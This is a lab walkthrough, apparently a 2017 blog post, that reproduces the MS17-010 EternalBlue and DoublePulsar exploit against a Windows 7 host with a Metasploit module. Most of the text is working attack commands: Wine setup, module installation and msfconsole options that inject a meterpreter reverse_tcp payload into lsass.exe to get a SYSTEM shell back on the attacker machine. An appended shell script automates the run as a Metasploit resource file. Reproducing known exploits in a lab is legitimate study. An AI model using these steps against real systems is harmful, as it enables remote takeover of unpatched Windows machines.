Equation Group: reproducing MS17-010 (EternalBlue + DoublePulsar)

2017-05-16 22:28:33

0x01 Environment:

Target: Windows 7 x86, 192.168.1.120

Attacker: Kali, 192.168.1.99

0x02 Environment setup

Exploit module: https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
The module does not reimplement the exploit; it drives the leaked Windows binaries for EternalBlue and DoublePulsar, so Kali needs Wine to run Windows programs:

apt-get install wine
wine cmd.exe    # opens a Windows cmd.exe under Wine (sanity check that Wine works); type exit to quit

Clone the repository into Kali and copy eternalblue_doublepulsar.rb into Metasploit's exploits/windows/smb module folder, i.e. /usr/share/metasploit-framework/modules/exploits/windows/smb (msfconsole loads modules from that tree on start-up; run reload_all if it is already open):

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
cp Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

0x03 Exploitation

Set the options to match your environment. DOUBLEPULSARPATH and ETERNALBLUEPATH must point to the deps folder of the GitHub clone, which holds the executables and dlls that DOUBLEPULSAR and ETERNALBLUE need; if you cloned the repository somewhere other than the module's default deps location, uncomment those two lines and set them to your deps path (the commented values below assume deps was copied next to the .rb file). PROCESSINJECT is the process DoublePulsar injects the payload DLL into; lsass.exe runs as SYSTEM, which is why it is the usual choice.
Set a payload.
Note: if the target is 64-bit, use set payload windows/x64/meterpreter/reverse_tcp and also set TARGETARCHITECTURE x64 (the commented line below), otherwise the injected DLL will not match the target process.
EternalBlue is a kernel-mode SMB exploit: a failed attempt can blue-screen the target, so only run this against a lab machine you own.

Then open msfconsole:

use exploit/windows/smb/eternalblue_doublepulsar
#set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
#set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set processinject lsass.exe
#set TARGETARCHITECTURE x64
set rhost 192.168.1.120
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.99
show targets
set target 9
options
run

Finally the reverse shell comes back in msf, and the session confirms the target and gives a system shell:

meterpreter > sysinfo
meterpreter > shell
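The steps above are interactive and easy to mistype, and the x64 caveat (payload plus TARGETARCHITECTURE) is easy to forget. The script below is an added example, not part of the original post or of the ElevenPaths module: it checks that the deps folder actually contains the two Windows binaries the module runs under Wine, then writes a Metasploit resource script with the option set used above so the run is reproducible with `msfconsole -r`. The binary names Eternalblue-2.2.0.exe and Doublepulsar-1.3.1.exe, the deps path under $HOME, and the target id 9 are assumptions taken from the post's own setup; check them against your clone and the output of show targets.

```shell
#!/bin/sh
# Added example (not from the original post or the module repository).
# Assumptions: the deps folder of the clone contains Eternalblue-2.2.0.exe
# and Doublepulsar-1.3.1.exe; option names are those used in the post.

# Check that the deps directory holds the Windows binaries the module runs
# under Wine. Returns 0 if both are present, 1 (with a message) otherwise.
check_deps() {
    dir=$1
    for f in Eternalblue-2.2.0.exe Doublepulsar-1.3.1.exe; do
        if [ ! -f "$dir/$f" ]; then
            echo "missing $dir/$f" >&2
            return 1
        fi
    done
    return 0
}

# Print a Metasploit resource script for one target.
# $1 = RHOST, $2 = LHOST, $3 = x86 or x64, $4 = deps directory, $5 = target id
# The architecture selects both the payload and TARGETARCHITECTURE together,
# so a 64-bit target cannot end up with a 32-bit payload by mistake.
make_rc() {
    rhost=$1; lhost=$2; arch=$3; deps=$4; target=$5
    case "$arch" in
        x86) payload=windows/meterpreter/reverse_tcp ;;
        x64) payload=windows/x64/meterpreter/reverse_tcp ;;
        *) echo "arch must be x86 or x64" >&2; return 1 ;;
    esac
    cat <<EOF
use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH $deps
set ETERNALBLUEPATH $deps
set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE $arch
set RHOST $rhost
set PAYLOAD $payload
set LHOST $lhost
set TARGET $target
run
EOF
}

# Usage (lab values from the post; deps path is an assumption):
# DEPS="$HOME/Eternalblue-Doublepulsar-Metasploit/deps"
# check_deps "$DEPS" || exit 1
# make_rc 192.168.1.120 192.168.1.99 x86 "$DEPS" 9 > ms17010.rc
# msfconsole -q -r ms17010.rc
```

Running check_deps first catches the most common failure of this module (a wrong DOUBLEPULSARPATH/ETERNALBLUEPATH) before any SMB traffic is sent, and the generated .rc file can be kept alongside the lab notes so the exact options used are recorded.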

References
SMB (MS17-010) remote command execution with msf
MS17-010
Equation Group exploitation: compromising Windows without Fuzzbunch
Reproducing the Equation Group ETERNALBLUE exploit with fb.py